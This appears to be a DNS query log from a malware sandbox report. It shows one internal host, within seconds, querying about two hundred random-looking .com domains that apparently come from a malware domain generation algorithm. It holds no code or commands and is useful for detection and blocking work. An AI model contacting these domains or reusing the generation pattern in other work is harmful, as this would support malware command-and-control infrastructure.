                                                                                                                                                                                                            Sep 8, 2024 09:00:01.247975111 CEST192.168.2.41.1.1.10xd202Standard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.248569012 CEST192.168.2.41.1.1.10x8f61Standard query (0)purycul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.250782967 CEST192.168.2.41.1.1.10x1085Standard query (0)lyxywij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.251126051 CEST192.168.2.41.1.1.10x1937Standard query (0)qegyhev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.253139973 CEST192.168.2.41.1.1.10x287aStandard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.253353119 CEST192.168.2.41.1.1.10x2d12Standard query (0)gaqycyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.255132914 CEST192.168.2.41.1.1.10xce6eStandard query (0)lymyxex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.255809069 CEST192.168.2.41.1.1.10x83d7Standard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.257371902 CEST192.168.2.41.1.1.10xebb2Standard query (0)puzywuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.281428099 CEST192.168.2.41.1.1.10xea35Standard query (0)pupyboq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.282286882 CEST192.168.2.41.1.1.10x55fdStandard query (0)vonyzac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.282738924 CEST192.168.2.41.1.1.10x526bStandard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.282779932 CEST192.168.2.41.1.1.10x791Standard query (0)lykyjux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.282977104 CEST192.168.2.41.1.1.10xb17cStandard query (0)gacyroh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.283293009 CEST192.168.2.41.1.1.10x3c28Standard query (0)pumyxep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.283459902 CEST192.168.2.41.1.1.10x135bStandard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.289261103 CEST192.168.2.41.1.1.10xb25aStandard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.289637089 CEST192.168.2.41.1.1.10x351fStandard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.289838076 CEST192.168.2.41.1.1.10xb7deStandard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.289994001 CEST192.168.2.41.1.1.10x24b7Standard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.290208101 CEST192.168.2.41.1.1.10xe516Standard query (0)vocyrom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.290237904 CEST192.168.2.41.1.1.10x2e4fStandard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.290419102 CEST192.168.2.41.1.1.10x38dcStandard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.290524960 CEST192.168.2.41.1.1.10x3854Standard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.290808916 CEST192.168.2.41.1.1.10xe8bcStandard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.291017056 CEST192.168.2.41.1.1.10x9938Standard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.291254997 CEST192.168.2.41.1.1.10x93bfStandard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.291454077 CEST192.168.2.41.1.1.10x9d42Standard query (0)lyvytan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.291634083 CEST192.168.2.41.1.1.10x68f5Standard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.292186022 CEST192.168.2.41.1.1.10xcd22Standard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.292341948 CEST192.168.2.41.1.1.10xefe4Standard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.292732954 CEST192.168.2.41.1.1.10xd8dfStandard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.292732954 CEST192.168.2.41.1.1.10xae67Standard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.292829990 CEST192.168.2.41.1.1.10x24ffStandard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.293030024 CEST192.168.2.41.1.1.10x930eStandard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.293198109 CEST192.168.2.41.1.1.10x5d51Standard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.293353081 CEST192.168.2.41.1.1.10x37faStandard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.293973923 CEST192.168.2.41.1.1.10x7f9bStandard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.294289112 CEST192.168.2.41.1.1.10x8a1eStandard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.294509888 CEST192.168.2.41.1.1.10x74b2Standard query (0)lygymyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.295867920 CEST192.168.2.41.1.1.10xe448Standard query (0)galyquw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.296062946 CEST192.168.2.41.1.1.10xa18cStandard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.296401978 CEST192.168.2.41.1.1.10xe982Standard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.296578884 CEST192.168.2.41.1.1.10x4e92Standard query (0)pufymyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.296753883 CEST192.168.2.41.1.1.10x942Standard query (0)qexylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.296969891 CEST192.168.2.41.1.1.10xaaa5Standard query (0)gacyzaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.297125101 CEST192.168.2.41.1.1.10xae97Standard query (0)galykiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.297286034 CEST192.168.2.41.1.1.10xad1fStandard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.300158978 CEST192.168.2.41.1.1.10xa86Standard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.300395966 CEST192.168.2.41.1.1.10x5005Standard query (0)gaqydus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.581588984 CEST192.168.2.41.1.1.10x2931Standard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.586479902 CEST192.168.2.41.1.1.10xc0fbStandard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.587265968 CEST192.168.2.41.1.1.10x8c71Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.589863062 CEST192.168.2.41.1.1.10x5b38Standard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.590621948 CEST192.168.2.41.1.1.10x3e2cStandard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.593396902 CEST192.168.2.41.1.1.10x89bcStandard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.595648050 CEST192.168.2.41.1.1.10xef8fStandard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.595880032 CEST192.168.2.41.1.1.10x6d12Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.596015930 CEST192.168.2.41.1.1.10x4a80Standard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.596293926 CEST192.168.2.41.1.1.10x3094Standard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.596812963 CEST192.168.2.41.1.1.10x1835Standard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.597510099 CEST192.168.2.41.1.1.10x7df0Standard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.597882032 CEST192.168.2.41.1.1.10xb375Standard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.598054886 CEST192.168.2.41.1.1.10x3486Standard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.598674059 CEST192.168.2.41.1.1.10xe98cStandard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.598990917 CEST192.168.2.41.1.1.10x2f7fStandard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.603414059 CEST192.168.2.41.1.1.10xfcf9Standard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.603924990 CEST192.168.2.41.1.1.10x30Standard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.605700016 CEST192.168.2.41.1.1.10x8ba2Standard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.606934071 CEST192.168.2.41.1.1.10x9c0eStandard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.619966984 CEST192.168.2.41.1.1.10x65ebStandard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.620150089 CEST192.168.2.41.1.1.10xcb8dStandard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.620497942 CEST192.168.2.41.1.1.10xb99Standard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.620626926 CEST192.168.2.41.1.1.10xdcb8Standard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.620661974 CEST192.168.2.41.1.1.10xaab5Standard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.620898008 CEST192.168.2.41.1.1.10x36f1Standard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.636396885 CEST192.168.2.41.1.1.10xa351Standard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.636893988 CEST192.168.2.41.1.1.10x9fceStandard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.637315035 CEST192.168.2.41.1.1.10xd874Standard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.637656927 CEST192.168.2.41.1.1.10xab11Standard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.639713049 CEST192.168.2.41.1.1.10x7188Standard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.641783953 CEST192.168.2.41.1.1.10x2dbeStandard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.643759966 CEST192.168.2.41.1.1.10x14c2Standard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.643789053 CEST192.168.2.41.1.1.10xf80aStandard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.651027918 CEST192.168.2.41.1.1.10x3184Standard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.651518106 CEST192.168.2.41.1.1.10xe862Standard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.651726961 CEST192.168.2.41.1.1.10x7872Standard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.652055025 CEST192.168.2.41.1.1.10xf893Standard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.652312040 CEST192.168.2.41.1.1.10xdadStandard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.652489901 CEST192.168.2.41.1.1.10x691dStandard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.653496027 CEST192.168.2.41.1.1.10x7529Standard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.655719995 CEST192.168.2.41.1.1.10x37efStandard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.656735897 CEST192.168.2.41.1.1.10x1eb3Standard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.657202959 CEST192.168.2.41.1.1.10xfbb5Standard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.657948971 CEST192.168.2.41.1.1.10x8dd9Standard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.658766985 CEST192.168.2.41.1.1.10x9ce5Standard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.659145117 CEST192.168.2.41.1.1.10xbd4fStandard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.664844036 CEST192.168.2.41.1.1.10x79d3Standard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.751363993 CEST192.168.2.41.1.1.10x6b9aStandard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.773802996 CEST192.168.2.41.1.1.10x6b4Standard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.773988962 CEST192.168.2.41.1.1.10xd156Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.774174929 CEST192.168.2.41.1.1.10xffd5Standard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.774323940 CEST192.168.2.41.1.1.10xd27fStandard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.774482012 CEST192.168.2.41.1.1.10x8943Standard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.777024984 CEST192.168.2.41.1.1.10xff02Standard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.777477980 CEST192.168.2.41.1.1.10x7fc7Standard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.778558016 CEST192.168.2.41.1.1.10x1ce6Standard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.779124975 CEST192.168.2.41.1.1.10xe0efStandard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.779314041 CEST192.168.2.41.1.1.10x1c3eStandard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.779489994 CEST192.168.2.41.1.1.10xc592Standard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.779634953 CEST192.168.2.41.1.1.10x20e1Standard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.851362944 CEST192.168.2.41.1.1.10xb5d1Standard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.852447987 CEST192.168.2.41.1.1.10xbdcfStandard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.958602905 CEST192.168.2.41.1.1.10xdf5eStandard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.066165924 CEST192.168.2.41.1.1.10x7d97Standard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.071228981 CEST192.168.2.41.1.1.10xbb09Standard query (0)pumyliq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.073504925 CEST192.168.2.41.1.1.10xbb9Standard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.078145981 CEST192.168.2.41.1.1.10x3fa1Standard query (0)pupypep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.095963001 CEST192.168.2.41.1.1.10x1da3Standard query (0)qekynog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.111474991 CEST192.168.2.41.1.1.10xfc9aStandard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.112112045 CEST192.168.2.41.1.1.10x1df0Standard query (0)purytov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.130295038 CEST192.168.2.41.1.1.10xff9cStandard query (0)gaqyrib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.140973091 CEST192.168.2.41.1.1.10xee70Standard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.145796061 CEST192.168.2.41.1.1.10xed01Standard query (0)lygyvuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.148029089 CEST192.168.2.41.1.1.10xccecStandard query (0)puzygop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.149658918 CEST192.168.2.41.1.1.10x36d2Standard query (0)lymywun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.151408911 CEST192.168.2.41.1.1.10x31b5Standard query (0)gadycew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.154128075 CEST192.168.2.41.1.1.10xf622Standard query (0)vowyrif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.157718897 CEST192.168.2.41.1.1.10x3cf5Standard query (0)qexyhap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.159827948 CEST192.168.2.41.1.1.10x3174Standard query (0)pufycyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.167094946 CEST192.168.2.41.1.1.10xf93eStandard query (0)volygoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.167557955 CEST192.168.2.41.1.1.10x649aStandard query (0)qeqyrug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.167728901 CEST192.168.2.41.1.1.10x4c80Standard query (0)vofycyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.182686090 CEST192.168.2.41.1.1.10x3111Standard query (0)ganykuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.183371067 CEST192.168.2.41.1.1.10x4650Standard query (0)vonykuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.183870077 CEST192.168.2.41.1.1.10xfcb8Standard query (0)lysysyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.184051037 CEST192.168.2.41.1.1.10xc195Standard query (0)lykynon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.184243917 CEST192.168.2.41.1.1.10x9965Standard query (0)vopypec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.184406042 CEST192.168.2.41.1.1.10x279aStandard query (0)qebykul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.184741020 CEST192.168.2.41.1.1.10x2d64Standard query (0)lyxygax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.185015917 CEST192.168.2.41.1.1.10xd8d1Standard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.185261011 CEST192.168.2.41.1.1.10x68d2Standard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.185491085 CEST192.168.2.41.1.1.10xcb0fStandard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.185956001 CEST192.168.2.41.1.1.10xb206Standard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.190890074 CEST192.168.2.41.1.1.10x53cStandard query (0)qetytav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.191553116 CEST192.168.2.41.1.1.10x19efStandard query (0)puvyjyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.192548990 CEST192.168.2.41.1.1.10xf738Standard query (0)gahyvuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.218518972 CEST192.168.2.41.1.1.10xe25cStandard query (0)lyrytod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.219914913 CEST192.168.2.41.1.1.10x9137Standard query (0)vocyjet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.220276117 CEST192.168.2.41.1.1.10xf5feStandard query (0)qegyvuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.377217054 CEST192.168.2.41.1.1.10xb9f9Standard query (0)vojyduf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.378781080 CEST192.168.2.41.1.1.10x489eStandard query (0)lyrylix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.381547928 CEST192.168.2.41.1.1.10x4b43Standard query (0)vocymak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.381710052 CEST192.168.2.41.1.1.10x183dStandard query (0)purylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.381757975 CEST192.168.2.41.1.1.10xdaa6Standard query (0)gacynow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.381925106 CEST192.168.2.41.1.1.10x7e44Standard query (0)qegysyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.382033110 CEST192.168.2.41.1.1.10x7756Standard query (0)lyvymej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.382110119 CEST192.168.2.41.1.1.10x223fStandard query (0)puvymaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.528510094 CEST192.168.2.41.1.1.10x7dc5Standard query (0)gahydyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.529782057 CEST192.168.2.41.1.1.10x8f51Standard query (0)gatyzoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.530505896 CEST192.168.2.41.1.1.10x6628Standard query (0)vowykuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.530806065 CEST192.168.2.41.1.1.10xc12aStandard query (0)lygysen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.531073093 CEST192.168.2.41.1.1.10x507bStandard query (0)qebyqeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.531233072 CEST192.168.2.41.1.1.10x701fStandard query (0)qetylip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.531375885 CEST192.168.2.41.1.1.10xa6dfStandard query (0)qexynol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.531652927 CEST192.168.2.41.1.1.10xaa19Standard query (0)lykyfud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.535439014 CEST192.168.2.41.1.1.10xc1b4Standard query (0)galyfis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.535932064 CEST192.168.2.41.1.1.10xc235Standard query (0)pufypeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.536003113 CEST192.168.2.41.1.1.10x23c9Standard query (0)pupyxal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.536340952 CEST192.168.2.41.1.1.10xeab8Standard query (0)gaqykus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.541454077 CEST192.168.2.41.1.1.10xb6ceStandard query (0)pujyduv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.541697025 CEST192.168.2.41.1.1.10x27b9Standard query (0)qekyfiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.542828083 CEST192.168.2.41.1.1.10x1f28Standard query (0)pumywug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.543570042 CEST192.168.2.41.1.1.10x33adStandard query (0)vonyqym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.544018030 CEST192.168.2.41.1.1.10xaeffStandard query (0)lysyxar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.544109106 CEST192.168.2.41.1.1.10x2459Standard query (0)ganyqyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.544194937 CEST192.168.2.41.1.1.10x9badStandard query (0)qedyxel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.544372082 CEST192.168.2.41.1.1.10x7854Standard query (0)vopyzot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.179406881 CEST192.168.2.41.1.1.10xd393Standard query (0)volybut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.188781023 CEST192.168.2.41.1.1.10x537Standard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.191028118 CEST192.168.2.41.1.1.10xf835Standard query (0)ganyhab.comA (IP address)IN (0x0001)false
